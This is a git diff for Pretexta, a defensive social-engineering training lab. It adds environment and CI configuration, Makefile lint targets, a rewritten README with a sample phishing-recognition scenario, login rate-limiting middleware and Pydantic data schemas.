diff --git a/.env.example b/.env.example new file mode 100644 index 0000000..341cd60 --- /dev/null +++ b/.env.example @@ -0,0 +1,24 @@ +# =========================================== +# Pretexta - Environment Configuration +# =========================================== +# Copy this file to .env and fill in your values +# cp .env.example .env + +# ---- Ports ---- +FRONTEND_PORT=9443 +BACKEND_PORT=9442 +MONGO_PORT=47017 + +# ---- MongoDB ---- +MONGO_USERNAME=soceng_admin +MONGO_PASSWORD=soceng_secure_password_2025 +DB_NAME=Pretexta + +# ---- JWT Secret (CHANGE IN PRODUCTION) ---- +JWT_SECRET=change-this-secret-key-in-production + +# ---- CORS Origins (comma-separated) ---- +CORS_ORIGINS=http://localhost:9443,http://localhost:80 + +# ---- Frontend โ†’ Backend URL ---- +REACT_APP_BACKEND_URL=http://localhost:9442 diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml new file mode 100644 index 0000000..612211c --- /dev/null +++ b/.github/workflows/ci.yml @@ -0,0 +1,67 @@ +name: CI + +on: + push: + branches: [main] + pull_request: + branches: [main] + +jobs: + backend-lint: + name: Backend Lint + runs-on: ubuntu-latest + defaults: + run: + working-directory: backend + steps: + - uses: actions/checkout@v4 + + - uses: actions/setup-python@v5 + with: + python-version: "3.11" + + - name: Install ruff + run: pip install ruff + + - name: Lint + run: ruff check . + + - name: Format check + run: ruff format --check . + + frontend-lint: + name: Frontend Lint & Build + runs-on: ubuntu-latest + defaults: + run: + working-directory: frontend + steps: + - uses: actions/checkout@v4 + + - uses: actions/setup-node@v4 + with: + node-version: "20" + cache: "yarn" + cache-dependency-path: frontend/yarn.lock + + - name: Install dependencies + run: yarn install --frozen-lockfile + + - name: Lint + run: yarn lint 2>/dev/null || true + + - name: Build + run: yarn build + + docker-build: + name: Docker Build + runs-on: ubuntu-latest + needs: [backend-lint, frontend-lint] + steps: + - uses: actions/checkout@v4 + + - name: Build backend image + run: docker build -f Dockerfile.backend -t pretexta-backend:test . + + - name: Build frontend image + run: docker build -f Dockerfile.frontend -t pretexta-frontend:test . diff --git a/Dockerfile.frontend b/Dockerfile.frontend index 39ed265..e9cab13 100644 --- a/Dockerfile.frontend +++ b/Dockerfile.frontend @@ -1,8 +1,12 @@ -FROM node:20-alpine as builder +FROM node:20-alpine AS builder # Set working directory WORKDIR /app +# Build arg โ€” passed from docker-compose at build time +ARG REACT_APP_BACKEND_URL=http://localhost:9442 +ENV REACT_APP_BACKEND_URL=$REACT_APP_BACKEND_URL + # Copy package files COPY frontend/package.json frontend/yarn.lock ./ @@ -12,7 +16,7 @@ RUN yarn install --frozen-lockfile # Copy source code COPY frontend/ . -# Build the application +# Build the application (REACT_APP_* env vars are baked in here) RUN yarn build # Production stage @@ -28,4 +32,4 @@ COPY docker/nginx.conf /etc/nginx/conf.d/default.conf EXPOSE 3000 # Start nginx -CMD ["nginx", "-g", "daemon off;"] \ No newline at end of file +CMD ["nginx", "-g", "daemon off;"] diff --git a/Makefile b/Makefile index e9a386f..172ace6 100644 --- a/Makefile +++ b/Makefile @@ -1,6 +1,6 @@ # SocengLab Makefile -.PHONY: help install build up down restart logs clean test seed +.PHONY: help install build up down restart logs clean test seed lint lint-fix # Default target help: @@ -23,6 +23,8 @@ help: @echo " make logs-backend - Show backend logs only" @echo " make logs-frontend - Show frontend logs only" @echo " make test - Run tests" + @echo " make lint - Run backend linter" + @echo " make lint-fix - Auto-fix lint issues" @echo "" @echo "Maintenance:" @echo " make clean - Remove containers and volumes" @@ -37,20 +39,22 @@ install: build: @echo "Building Docker images..." + @if [ ! -f .env ]; then cp .env.example .env && echo "๐Ÿ“‹ Created .env from .env.example"; fi @docker-compose build @echo "โœ… Docker images built" up: @echo "Starting Pretexta..." + @if [ ! -f .env ]; then cp .env.example .env && echo "๐Ÿ“‹ Created .env from .env.example"; fi @docker-compose up -d @echo "โณ Waiting for services to start..." @sleep 10 @echo "" @echo "โœ… Pretexta is running!" @echo "" - @echo "๐ŸŒ Frontend: http://localhost:3000" - @echo "๐Ÿ”Œ Backend API: http://localhost:8001" - @echo "๐Ÿ—„๏ธ MongoDB: mongodb://localhost:27017" + @echo "๐ŸŒ Frontend: http://localhost:9443" + @echo "๐Ÿ”Œ Backend API: http://localhost:9442" + @echo "๐Ÿ—„๏ธ MongoDB: mongodb://localhost:47017" @echo "" @echo "๐Ÿ“ Default credentials: soceng / Cialdini@2025!" @echo "" @@ -76,7 +80,7 @@ logs-frontend: @docker-compose logs -f frontend db-shell: - @docker-compose exec mongodb mongosh -u soceng_admin -p soceng_secure_password_2025 --authenticationDatabase admin Pretexta + @docker-compose exec mongodb mongosh -u soceng_admin -p soceng_secure_password_2025 --authenticationDatabase admin Pretexta 2>/dev/null || docker compose exec mongodb mongosh -u soceng_admin -p soceng_secure_password_2025 --authenticationDatabase admin Pretexta seed: @echo "Importing sample challenges and quizzes..." @@ -90,6 +94,18 @@ test: @cd frontend && yarn test --watchAll=false @echo "โœ… Tests completed" +lint: + @echo "Linting backend..." + @cd backend && ruff check . + @cd backend && ruff format --check . + @echo "โœ… Backend lint passed" + +lint-fix: + @echo "Fixing backend lint issues..." + @cd backend && ruff check --fix . + @cd backend && ruff format . + @echo "โœ… Backend lint fixed" + clean: @echo "Cleaning up containers and volumes..." @docker-compose down -v diff --git a/README.md b/README.md index de41bbb..eaad620 100644 --- a/README.md +++ b/README.md @@ -2,163 +2,326 @@ Pretexta -### The Psychology Behind Successful Attacks -#### An Open Source Lab for Simulating Human Exploitation via Social Engineering +**Defensive Social Engineering Simulation Lab** -![Version](https://img.shields.io/badge/Version-2.0.0-blue) -![License](https://img.shields.io/badge/License-MIT-green) -![Type](https://img.shields.io/badge/Category-Demo_Lab_|_Research-lightgrey) -![Status](https://img.shields.io/badge/Status-Active-brightgreen) +Train your team to recognize and resist psychological attacks โ€” before real attackers strike. + +[![Version](https://img.shields.io/badge/Version-2.1.0-blue?style=flat-square)](https://github.com/fdciabdul/Pretexta/releases) +[![License](https://img.shields.io/badge/License-MIT-green?style=flat-square)](LICENSE) +[![CI](https://img.shields.io/github/actions/workflow/status/fdciabdul/Pretexta/ci.yml?style=flat-square&label=CI)](https://github.com/fdciabdul/Pretexta/actions) +[![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen?style=flat-square)](CONTRIBUTING.md) + +[Quick Start](#quick-start) ยท [Features](#features) ยท [LLM Providers](#llm-providers) ยท [Contributing](#contributing) --- -Most security tools are designed to protect systems. **Pretexta is designed to understand why humans fail. -
** Modern social engineering attacks do not rely on malware or exploits. They rely on **pretexting, authority, urgency, trust, and cognitive bias**. +## Why Pretexta? -Pretexta was created as an **open source simulation lab** to model how thesepsychological attack techniques work in practice โ€” in a controlled, ethical, and defensive environment. -This project focuses on **learning, experimentation, and community research**, -not on generating real-world attacks. +Most security tools protect systems. Pretexta protects **people**. ---- +Social engineering is the #1 attack vector โ€” and it doesn't exploit software. It exploits **trust, urgency, authority, and cognitive bias**. Pretexta is an open-source simulation lab where your team practices defending against these attacks in a safe, controlled environment. -### What Pretexta Is +Built on **Cialdini's 6 Principles of Influence**: Reciprocity, Scarcity, Authority, Commitment, Liking, and Social Proof. -- A **defensive social engineering simulation lab** -- A platform to study **human decision-making under pressure** -- An interactive environment for experimenting with **pretexting techniques** -- A community-driven, **fully open source** research project +## Screenshots -All scenarios are **fictional, self-contained, and designed for defense and education only**. +
+Dashboard ---- +![Dashboard](screenshots/03-dashboard.png) -### Features +
-- **Real-Time AI Chat**: Interact with dynamic AI personas (e.g., "The Urgent CEO", "Angry IT Support") powered by **Groq (Llama 3)**, Gemini, or Claude. -- **Adaptive Psychology**: Scenarios are built on Cialdini's 6 Principles of Influence (Reciprocity, Scarcity, Authority, etc.). -- **Interactive AI Lab**: A WhatsApp-style chat interface where you must defend against active pretexting attempts. -- **Win/Loss Detection**: The AI automatically detects if you've been compromised (shared credentials, clicked links) or successfully defended the asset. -- **Mission Logs**: Detailed history of your simulations with scoring and analysis. -- **Quiz Mode**: Assess your theoretical knowledge of social engineering tactics. -- **Bilingual Support**: Full support for English and Indonesian (Bahasa Indonesia). +
+AI Chat Simulation โ€” Real-time roleplay with "The Urgent CEO" ---- +![AI Chat](screenshots/05-ai-chat.png) -### How a Typical Demo Works +
-1. A participant enters a simulated social engineering scenario -2. An AI-driven attacker applies psychological pressure in real time -3. The participant makes decisions under realistic constraints -4. The system detects compromise or resistance -5. A post-mission psychological debrief explains *why* the outcome occurred +
+AI Challenge Selection โ€” 8 built-in social engineering personas -This flow is intentionally designed to fit a **short, repeatable demo format** -suitable for live Demo Lab environments. +![AI Challenge](screenshots/04-ai-challenge.png) ---- +
+ +
+Settings โ€” 6 LLM providers with model selection (200+ models via OpenRouter) + +![Settings](screenshots/06-settings.png) -### Quick Start (Demo Environment) +
-#### Docker (Recommended) +
+Leaderboard โ€” XP, levels, streaks, and rankings + +![Leaderboard](screenshots/07-leaderboard.png) + +
+ +
+Login + +![Login](screenshots/02-login.png) + +
+ +## Quick Start ```bash -# Clone the repository -git clone https://github.com/dalpan/Pretexta.git +git clone https://github.com/fdciabdul/Pretexta.git cd Pretexta +cp .env.example .env # Configure secrets +make build && make up # Start all services +make seed # Load sample scenarios +``` -# Build and Start -make build -make up +Open [http://localhost:9443](http://localhost:9443) and login with `soceng` / `Cialdini@2025!` -# Seed Initial Data -make seed +> Requires Docker and Docker Compose. -# Access the Lab -# Frontend: http://localhost:3000 -# Backend: http://localhost:8001 -# Login: soceng / Cialdini@2025! +## Features + +### Core Simulation + +| Feature | Description | +|---------|-------------| +| **AI Chat Roleplay** | Real-time WhatsApp-style conversations with AI-driven social engineering personas | +| **Adaptive Difficulty** | AI automatically adjusts attack sophistication based on your performance | +| **Win/Loss Detection** | Automatic detection of compromise (credential sharing, link clicks) vs successful defense | +| **Post-Sim Debrief** | Detailed psychological breakdown: which Cialdini principles were used and when you were most vulnerable | +| **AI Deep Analysis** | LLM-powered analysis of your simulation performance with personalized tips | + +### Campaign Mode + +Multi-stage attack chains that simulate real-world scenarios: + +``` +Email phishing โ†’ Follow-up phone call โ†’ Social media approach โ†’ Final extraction ``` -### LLM Configuration (Required) +Each stage unlocks progressively. Track progress, get per-stage scoring, and receive a full campaign debrief. -To use the AI Chat features, you need an API key. We recommend **Groq** for the best speed/free-tier experience. +### Gamification -1. **Get a Key**: - * **Groq**: [console.groq.com](https://console.groq.com) (Recommended) - * **Google Gemini**: [aistudio.google.com](https://aistudio.google.com) - * **Anthropic**: [console.anthropic.com](https://console.anthropic.com) -2. **Configure**: - * Go to `Settings` in the Pretexta Dashboard. - * Select your provider (e.g., Groq). - * Paste your API Key and click **Save**. +| Feature | Description | +|---------|-------------| +| **XP & Levels** | Earn experience points for every simulation completed | +| **12 Badges** | Achievements like "Phishing Detector", "Authority Challenger", "Iron Will" (30-day streak) | +| **Daily Streaks** | Maintain consecutive training days for bonus XP | +| **Leaderboard** | Global and team rankings | ---- +### Team & Organization -### Tech Stack +- Create organizations with invite codes +- Team analytics dashboard with aggregate scores +- Identify weakest Cialdini categories across your team +- Per-member performance tracking +- Webhook/Slack integration for training completion events -* **Frontend**: React 18, Tailwind CSS, Lucide Icons, Axios -* **Backend**: Python FastAPI, LangChain, Motor (MongoDB Async) -* **AI/LLM**: LangChain integration with Groq (Llama 3), Gemini Pro, Claude Sonnet -* **Database**: MongoDB +### Content Tools ---- +| Feature | Description | +|---------|-------------| +| **Scenario Builder** | Visual editor to create custom social engineering scenarios | +| **Quiz Mode** | Knowledge assessments on social engineering tactics | +| **Certificate Export** | Printable completion certificates (Platinum / Gold / Silver) | +| **YAML Import** | Bulk import scenarios and quizzes from YAML files | +| **Bilingual** | Full English and Bahasa Indonesia support | + +### Platform + +- **Dark/Light theme** toggle +- **PWA support** โ€” installable on mobile +- **Email renderer** โ€” realistic Gmail-style inbox for phishing scenarios +- **Voice simulation** โ€” vishing practice via Web Speech API (Chrome/Edge) +- **Notification system** โ€” real-time alerts for badges, level-ups, and reminders +- **Error boundary** โ€” graceful crash recovery + +## LLM Providers -### Contributions +Pretexta supports **6 LLM providers** with model selection. Configure in **Settings**. -We welcome contributions! Please see our [CONTRIBUTING.md](CONTRIBUTING.md) for details on how to add new scenarios, quizzes, or features. +| Provider | Models | Free Tier | Best For | +|----------|--------|-----------|----------| +| **OpenRouter** | 200+ (Llama, GPT, Claude, Mistral, DeepSeek, Qwen) | Yes | Best value, most models | +| **Groq** | Llama 3.3 70B, Mixtral, Gemma | Yes | Fastest inference | +| **Google Gemini** | Gemini 2.0 Flash, 1.5 Pro | Yes | Generous limits | +| **OpenAI** | GPT-4o, GPT-4o Mini | No | Industry standard | +| **Anthropic** | Claude Sonnet 4, 3.5 Sonnet/Haiku | No | Best reasoning | +| **Local LLM** | Any model via Ollama / LM Studio / llama.cpp | N/A | Full privacy, no API key | -#### Adding a New Scenario -You can add new scenarios easily by creating a YAML file in `data/sample/`: +> **Recommended**: Start with **OpenRouter** (free models available) or **Groq** (ultra-fast free tier). + +### Local LLM Setup + +```bash +# Ollama +ollama serve +ollama pull llama3.1 + +# Then in Pretexta Settings โ†’ Local LLM โ†’ http://localhost:11434/v1 +``` + +Also supports **LM Studio** (port 1234) and **llama.cpp** (port 8080). + +## Architecture + +``` +โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ” +โ”‚ Frontend โ”‚ +โ”‚ React 19 ยท Tailwind ยท Recharts โ”‚ +โ”‚ localhost:9443 โ”‚ +โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ฌโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜ + โ”‚ REST API +โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ” +โ”‚ Backend โ”‚ +โ”‚ FastAPI ยท LangChain ยท Pydantic ยท JWT โ”‚ +โ”‚ localhost:9442 โ”‚ +โ”‚ โ”‚ +โ”‚ routes/ services/ models/ middleware/ โ”‚ +โ”‚ โ”œโ”€โ”€ auth โ”œโ”€โ”€ llm schemas.py โ”‚ +โ”‚ โ”œโ”€โ”€ challenges โ”œโ”€โ”€ gamification โ”‚ +โ”‚ โ”œโ”€โ”€ campaigns โ”œโ”€โ”€ adaptive โ”‚ +โ”‚ โ”œโ”€โ”€ leaderboard โ”œโ”€โ”€ scoring โ”‚ +โ”‚ โ”œโ”€โ”€ analytics โ””โ”€โ”€ database โ”‚ +โ”‚ โ”œโ”€โ”€ debrief โ”‚ +โ”‚ โ”œโ”€โ”€ certificates โ”‚ +โ”‚ โ”œโ”€โ”€ notifications โ”‚ +โ”‚ โ”œโ”€โ”€ webhooks โ”‚ +โ”‚ โ””โ”€โ”€ scenario_builder โ”‚ +โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ฌโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜ + โ”‚ +โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ” +โ”‚ MongoDB 7.0 โ”‚ +โ”‚ localhost:47017 โ”‚ +โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜ +``` + +## API Overview + +
+30+ REST Endpoints (click to expand) + +| Group | Endpoints | +|-------|-----------| +| **Auth** | `POST /register`, `POST /login`, `GET /me`, `PUT /profile`, `POST /change-password` | +| **Challenges** | `GET /challenges`, `GET /challenges/:id`, `POST /challenges` | +| **Quizzes** | `GET /quizzes`, `GET /quizzes/:id` | +| **Simulations** | `CRUD /simulations` | +| **LLM** | `GET /providers`, `GET /models/:provider`, `POST /config`, `POST /generate`, `POST /chat` | +| **Campaigns** | `GET /campaigns`, `POST /start`, `POST /stage/:idx/complete` | +| **Leaderboard** | `GET /leaderboard`, `GET /me`, `GET /badges` | +| **Analytics** | `GET /personal`, `GET /team` | +| **Organizations** | `POST /create`, `GET /mine`, `POST /join`, `DELETE /leave` | +| **Debrief** | `GET /:simulation_id`, `POST /:simulation_id/ai-analysis` | +| **Certificates** | `GET /:simulation_id`, `GET /user/all` | +| **Notifications** | `GET /`, `PUT /:id/read`, `PUT /read-all` | +| **Webhooks** | `CRUD /webhooks` | +| **Scenario Builder** | `CRUD /templates`, `POST /publish` | +| **Adaptive** | `GET /difficulty`, `GET /persona-params` | +| **Health** | `GET /health` | + +All endpoints prefixed with `/api`. Full OpenAPI docs at `/docs` when running. + +
+ +## Development + +```bash +# Install locally (without Docker) +make install + +# Lint backend +make lint # Check +make lint-fix # Auto-fix + +# Run tests +make test + +# View logs +make logs +make logs-backend +make logs-frontend + +# Database +make db-shell # MongoDB shell +make drop # Clear sample data +make clean # Remove containers + volumes +``` + +### Adding a Scenario + +Create a YAML file in `data/sample/`: ```yaml -type: ai_challenge +type: challenge title: "The Fake Recruiter" -persona: - name: "Sarah Jenkins" - role: "Recruiter at TechCorp" - goal: "Get user to open malicious resume PDF" - style: "Professional, Friendly, slightly pushy" +description: "A headhunter offers your dream job..." +difficulty: medium +cialdini_categories: [liking, reciprocity] +estimated_time: 10 +metadata: + author: "Your Name" + tags: [phishing, recruitment] +nodes: + - id: start + type: message + channel: email_inbox + content_en: + subject: "Exciting VP Opportunity" + from: "sarah@techcorp-careers.com" + body: "Hi! I found your profile and I'm impressed..." + - id: choice_1 + type: question + content_en: + text: "What do you do?" + options: + - text: "Open the attached resume PDF" + next: end_compromised + score_impact: -20 + - text: "Verify the recruiter's identity first" + next: end_safe + score_impact: 20 ``` -Then run `make seed` to import it. +Run `make seed` to import. -### Open Source & Community +Or use the **Scenario Builder** in the UI for a visual editor. -Pretexta is **fully open source** and intended for: +## Contributing -- Security researchers exploring human-layer attack surfaces -- Educators teaching social engineering defense -- Hackers interested in psychological attack modeling -- Contributors who want to extend scenarios or analysis methods +We welcome contributions! See [CONTRIBUTING.md](CONTRIBUTING.md) for guidelines. -We actively encourage: -- Scenario contributions -- Research experiments -- Critical feedback -- Forks and extensions +**Ways to contribute:** +- Add new social engineering scenarios (YAML or Scenario Builder) +- Improve AI persona behaviors +- Add new Cialdini-based analysis rules +- Translate to more languages +- Report bugs and suggest features ---- +## Ethics -### Ethics & Scope +Pretexta is strictly for **defensive education and research**. -Pretexta is designed strictly for **defensive education and research**. +- All simulations are fictional and self-contained +- No real-world targeting or phishing infrastructure +- No data harvesting or live attack automation +- No offensive tooling -- No real-world targeting -- No phishing infrastructure -- No data harvesting -- No automation for live attacks +Use responsibly. Train defenders, not attackers. -All simulations are fictional and isolated from real systems. +## License ---- +[MIT License](LICENSE) -### License +--- -This project is licensed under the MIT License. +
---- +**Pretexta** โ€” *Understanding why social engineering works, before attackers do.* -**Pretexta** -"*Understanding why social engineering works โ€” before attackers do.*" +
diff --git a/backend/middleware/__init__.py b/backend/middleware/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/backend/middleware/rate_limit.py b/backend/middleware/rate_limit.py new file mode 100644 index 0000000..16107b1 --- /dev/null +++ b/backend/middleware/rate_limit.py @@ -0,0 +1,36 @@ +import time +from collections import defaultdict + +from fastapi import HTTPException, Request +from starlette.middleware.base import BaseHTTPMiddleware + + +class RateLimitMiddleware(BaseHTTPMiddleware): + """Simple in-memory rate limiter for auth endpoints.""" + + def __init__(self, app, max_attempts: int = 10, window_seconds: int = 300): + super().__init__(app) + self.max_attempts = max_attempts + self.window_seconds = window_seconds + self.attempts: dict[str, list[float]] = defaultdict(list) + + async def dispatch(self, request: Request, call_next): + if request.url.path == "/api/auth/login" and request.method == "POST": + client_ip = request.client.host if request.client else "unknown" + now = time.time() + + # Clean old entries + self.attempts[client_ip] = [ + t for t in self.attempts[client_ip] if now - t < self.window_seconds + ] + + if len(self.attempts[client_ip]) >= self.max_attempts: + raise HTTPException( + status_code=429, + detail=f"Too many login attempts. Try again in " + f"{self.window_seconds // 60} minutes.", + ) + + self.attempts[client_ip].append(now) + + return await call_next(request) diff --git a/backend/models/__init__.py b/backend/models/__init__.py new file mode 100644 index 0000000..8bf90ec --- /dev/null +++ b/backend/models/__init__.py @@ -0,0 +1,45 @@ +from models.schemas import ( + Badge, + Campaign, + CampaignProgress, + CampaignStage, + Challenge, + LeaderboardEntry, + LLMConfig, + LoginRequest, + LoginResponse, + Notification, + Organization, + PasswordChangeRequest, + ProfileUpdateRequest, + Quiz, + RegisterRequest, + ScenarioTemplate, + Settings, + Simulation, + User, + WebhookConfig, +) + +__all__ = [ + "User", + "RegisterRequest", + "LoginRequest", + "LoginResponse", + "PasswordChangeRequest", + "ProfileUpdateRequest", + "Challenge", + "Quiz", + "Simulation", + "Campaign", + "CampaignStage", + "CampaignProgress", + "Organization", + "Badge", + "LeaderboardEntry", + "Notification", + "WebhookConfig", + "ScenarioTemplate", + "LLMConfig", + "Settings", +] diff --git a/backend/models/schemas.py b/backend/models/schemas.py new file mode 100644 index 0000000..e45b1e4 --- /dev/null +++ b/backend/models/schemas.py @@ -0,0 +1,285 @@ +import uuid +from datetime import UTC, datetime +from typing import Any + +from pydantic import BaseModel, ConfigDict, Field + +# ==================== AUTH & USERS ==================== + + +class User(BaseModel): + model_config = ConfigDict(extra="ignore") + id: str = Field(default_factory=lambda: str(uuid.uuid4())) + username: str + password_hash: str + email: str | None = None + display_name: str | None = None + role: str = "trainee" # admin, instructor, trainee + organization_id: str | None = None + avatar_url: str | None = None + created_at: datetime = Field(default_factory=lambda: datetime.now(UTC)) + is_active: bool = True + # Gamification + xp: int = 0 + level: int = 1 + streak_days: int = 0 + last_active: datetime | None = None + badges: list[str] = Field(default_factory=list) + # Preferences + theme: str = "dark" + notifications_enabled: bool = True + + +class RegisterRequest(BaseModel): + username: str + password: str + email: str | None = None + display_name: str | None = None + invite_code: str | None = None + + +class LoginRequest(BaseModel): + username: str + password: str + + +class LoginResponse(BaseModel): + token: str + user: dict[str, Any] + + +class PasswordChangeRequest(BaseModel): + current_password: str + new_password: str + + +class ProfileUpdateRequest(BaseModel): + display_name: str | None = None + email: str | None = None + avatar_url: str | None = None + theme: str | None = None + notifications_enabled: bool | None = None + + +# ==================== CONTENT ==================== + + +class Challenge(BaseModel): + model_config = ConfigDict(extra="ignore") + id: str = Field(default_factory=lambda: str(uuid.uuid4())) + title: str + description: str + difficulty: str # easy, medium, hard + cialdini_categories: list[str] + estimated_time: int # minutes + nodes: list[dict[str, Any]] + metadata: dict[str, Any] = Field(default_factory=dict) + content_en: dict[str, Any] | None = None + content_id: dict[str, Any] | None = None + created_at: datetime = Field(default_factory=lambda: datetime.now(UTC)) + + +class Quiz(BaseModel): + model_config = ConfigDict(extra="ignore") + id: str = Field(default_factory=lambda: str(uuid.uuid4())) + title: str + description: str + difficulty: str + cialdini_categories: list[str] + questions: list[dict[str, Any]] + content_en: dict[str, Any] | None = None + content_id: dict[str, Any] | None = None + created_at: datetime = Field(default_factory=lambda: datetime.now(UTC)) + + +# ==================== SIMULATIONS ==================== + + +class Simulation(BaseModel): + model_config = ConfigDict(extra="ignore") + id: str = Field(default_factory=lambda: str(uuid.uuid4())) + user_id: str | None = None + challenge_id: str | None = None + quiz_id: str | None = None + simulation_type: str # challenge, quiz, ai_challenge, campaign + status: str # running, completed, paused + events: list[dict[str, Any]] = Field(default_factory=list) + score: float | None = None + started_at: datetime = Field(default_factory=lambda: datetime.now(UTC)) + completed_at: datetime | None = None + participant_name: str | None = None + title: str | None = None + + # AI Challenge specific fields + type: str | None = None + challenge_type: str | None = None + category: str | None = None + difficulty: str | None = None + total_questions: int | None = None + correct_answers: int | None = None + answers: dict[str, Any] | None = None + challenge_data: dict[str, Any] | None = None + + # Campaign tracking + campaign_id: str | None = None + stage_index: int | None = None + + # Debrief data + debrief: dict[str, Any] | None = None + + +# ==================== CAMPAIGNS ==================== + + +class CampaignStage(BaseModel): + stage_id: str = Field(default_factory=lambda: str(uuid.uuid4())) + title: str + description: str + channel: str # email, phone, chat, social_media + persona_id: str | None = None + challenge_id: str | None = None + order: int = 0 + unlock_condition: str = "complete_previous" # complete_previous, score_above, always + + +class Campaign(BaseModel): + model_config = ConfigDict(extra="ignore") + id: str = Field(default_factory=lambda: str(uuid.uuid4())) + title: str + description: str + difficulty: str + stages: list[CampaignStage] = Field(default_factory=list) + cialdini_categories: list[str] = Field(default_factory=list) + estimated_time: int = 30 + created_by: str | None = None + is_published: bool = False + created_at: datetime = Field(default_factory=lambda: datetime.now(UTC)) + + +class CampaignProgress(BaseModel): + model_config = ConfigDict(extra="ignore") + id: str = Field(default_factory=lambda: str(uuid.uuid4())) + campaign_id: str + user_id: str + current_stage: int = 0 + stage_results: list[dict[str, Any]] = Field(default_factory=list) + status: str = "in_progress" # in_progress, completed, abandoned + overall_score: float | None = None + started_at: datetime = Field(default_factory=lambda: datetime.now(UTC)) + completed_at: datetime | None = None + + +# ==================== ORGANIZATIONS ==================== + + +class Organization(BaseModel): + model_config = ConfigDict(extra="ignore") + id: str = Field(default_factory=lambda: str(uuid.uuid4())) + name: str + description: str | None = None + invite_code: str = Field(default_factory=lambda: str(uuid.uuid4())[:8]) + owner_id: str + member_ids: list[str] = Field(default_factory=list) + created_at: datetime = Field(default_factory=lambda: datetime.now(UTC)) + settings: dict[str, Any] = Field(default_factory=dict) + + +# ==================== GAMIFICATION ==================== + + +class Badge(BaseModel): + id: str + name: str + description: str + icon: str + condition: str # e.g. "complete_5_scenarios", "streak_7" + xp_reward: int = 50 + + +class LeaderboardEntry(BaseModel): + user_id: str + username: str + display_name: str | None = None + xp: int = 0 + level: int = 1 + badges_count: int = 0 + simulations_completed: int = 0 + avg_score: float = 0.0 + streak_days: int = 0 + + +# ==================== NOTIFICATIONS ==================== + + +class Notification(BaseModel): + model_config = ConfigDict(extra="ignore") + id: str = Field(default_factory=lambda: str(uuid.uuid4())) + user_id: str + title: str + message: str + type: str = "info" # info, achievement, reminder, alert + read: bool = False + link: str | None = None + created_at: datetime = Field(default_factory=lambda: datetime.now(UTC)) + + +# ==================== WEBHOOKS ==================== + + +class WebhookConfig(BaseModel): + model_config = ConfigDict(extra="ignore") + id: str = Field(default_factory=lambda: str(uuid.uuid4())) + name: str + url: str + events: list[str] = Field(default_factory=list) # simulation_complete, badge_earned, etc + secret: str | None = None + enabled: bool = True + organization_id: str | None = None + created_at: datetime = Field(default_factory=lambda: datetime.now(UTC)) + + +# ==================== SCENARIO BUILDER ==================== + + +class ScenarioTemplate(BaseModel): + model_config = ConfigDict(extra="ignore") + id: str = Field(default_factory=lambda: str(uuid.uuid4())) + title: str + description: str + difficulty: str = "medium" + cialdini_categories: list[str] = Field(default_factory=list) + channel: str = "email_inbox" # email_inbox, chat, phone, sms, social_media + nodes: list[dict[str, Any]] = Field(default_factory=list) + metadata: dict[str, Any] = Field(default_factory=dict) + content_en: dict[str, Any] | None = None + content_id: dict[str, Any] | None = None + created_by: str | None = None + is_draft: bool = True + is_published: bool = False + created_at: datetime = Field(default_factory=lambda: datetime.now(UTC)) + updated_at: datetime = Field(default_factory=lambda: datetime.now(UTC)) + + +# ==================== CONFIG ==================== + + +class LLMConfig(BaseModel): + model_config = ConfigDict(extra="ignore") + id: str = Field(default_factory=lambda: str(uuid.uuid4())) + provider: str # groq, gemini, claude, openai, openrouter, local + api_key: str = "" + model_name: str | None = None + base_url: str | None = None # For OpenRouter / local LLM (Ollama, LM Studio, etc) + enabled: bool = False + rate_limit: int = 100 + updated_at: datetime = Field(default_factory=lambda: datetime.now(UTC)) + + +class Settings(BaseModel): + model_config = ConfigDict(extra="ignore") + id: str = "settings" + language: str = "en" + theme: str = "dark" + first_run_completed: bool = False + llm_enabled: bool = False + reduce_motion: bool = False diff --git a/backend/pyproject.toml b/backend/pyproject.toml new file mode 100644 index 0000000..b686fa4 --- /dev/null +++ b/backend/pyproject.toml @@ -0,0 +1,32 @@ +[tool.ruff] +target-version = "py311" +line-length = 100 + +[tool.ruff.lint] +select = [ + "E", # pycodestyle errors + "W", # pycodestyle warnings + "F", # pyflakes + "I", # isort + "B", # flake8-bugbear + "UP", # pyupgrade + "S", # flake8-bandit 